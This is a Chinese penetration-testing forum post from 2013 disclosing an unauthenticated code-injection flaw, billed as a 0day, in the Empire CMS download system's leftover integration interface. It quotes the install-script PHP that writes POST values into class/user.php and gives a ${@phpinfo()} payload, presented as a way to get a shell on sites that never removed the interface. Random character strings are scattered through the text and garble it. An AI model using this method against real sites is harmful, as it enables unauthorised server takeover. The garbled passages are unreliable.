中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin 时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们5 S: D% w& J& `1 E  T  X
6 l7 ~. {3 e; g6 u

+ w) t0 Q9 W/ C! I0 g/ p
这是帝国的一套下载系统如图
: w/ ]3 [2 o+ H  R- Kps(不需要任何账户和密码，直接写shell)

7 N7 R$ f# t! |1 w5 D
由于很多站是由于下载要整合discuz 等等一些论坛....
1 e, N+ B8 u- T, r* S4 n
4 E& Q9 O: z3 q! @+ M) X$ B
而帝国他又有一个万能接口，如图
6 c- _. [1 Q* h# T* Z+ V/ i, {
[attach]170[/attach]% ~% Q4 I$ m9 a7 W) w
, U& e3 E0 V5 ^2 `9 V  g: I
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码9 m7 |5 w  l( Q3 `

& [0 |, b2 ?5 v# _) b0 \, C当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪1 ^( p9 G; t% h
5 [! K4 o& p4 q
在data/fun.php中的15行9 M( V  ]& V9 |9 C# Z: E
, w+ [( B3 K# K% s9 u
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {1 G# Q- W0 |4 D0 a- \

17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干$ }1 v6 ^- g# q
& J6 h$ q' ]% _/ f( Q
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
" [4 x0 `. |& U& b. s- a8 x+ a/ c! Y: D2 [, x' D4 e$ ~
他将传进来的变量进行了切割，然后赋给了$filetext  {2 ~% V* K+ D& E# E% T& Q  J
8 H) E% z7 O- k
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了  c) M  \; C9 m% {, G; i

* Q8 h' I9 w8 Y& W$ M9 H& A+ X7 D我们看看写入的结果，随便填一个
* J# ]8 d* V) z) s* Y' ]" p
[attach]171[/attach]
/ X4 [- D3 M! M5 }! m, D
6 H9 j! E( n. |! N, x0 M0 r- h/ A4 I" k. a
[attach]172[/attach]
9 z0 F( i% ]7 J
; y9 p( e+ n* h, E* {. i
3 o" H3 J6 q9 H& P  Q- {
9 }" s& v. M8 y' ]4 w4 ]  e) n  E2 @9 _  a% V% ^

3 u, F& b5 ~- s8 V  w$ f: g; J( B  S9 I. N7 x

5 a) O7 U# s: j# ~! o9 u, ^$ c$ d1 ?7 |- }% |7 a4 N

1 K0 {/ q( D: c& e. i5 {' }[attach]173[/attach]
' \5 [1 V" U9 N8 ?+ f, S3 f% D- w% r4 D* g7 p1 g
0 r6 p: ?9 C. _  r1 p' v" r
0 T& T* R2 z* w, y- y
$ X" X! L# _7 h* d; k7 V1 ?* X" f( ^

8 N1 y! J; n$ w1 ^0 ][attach]174[/attach]8 j& ], S' V! [2 F

0 w8 V9 ?- y2 R9 e% A+ B, q
所以我们淫荡点，写个${@phpinfo()}试试

2 F/ g# \8 C5 M0 p4 u! l0 e% t: z
然后访问以下class/user.php这个文件! \9 i6 Y# B9 l7 c' P' n8 p+ N6 h
日了吧

# E+ p5 h9 `: A/ P% D/ C4 U+ e7 v: s9 M5 ?* W

* b2 l6 {( r. U4 l/ m* g$ _$ _7 d. f1 _5 U7 L, D
! ^6 Y* D1 y" Z! ~0 x+ H

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)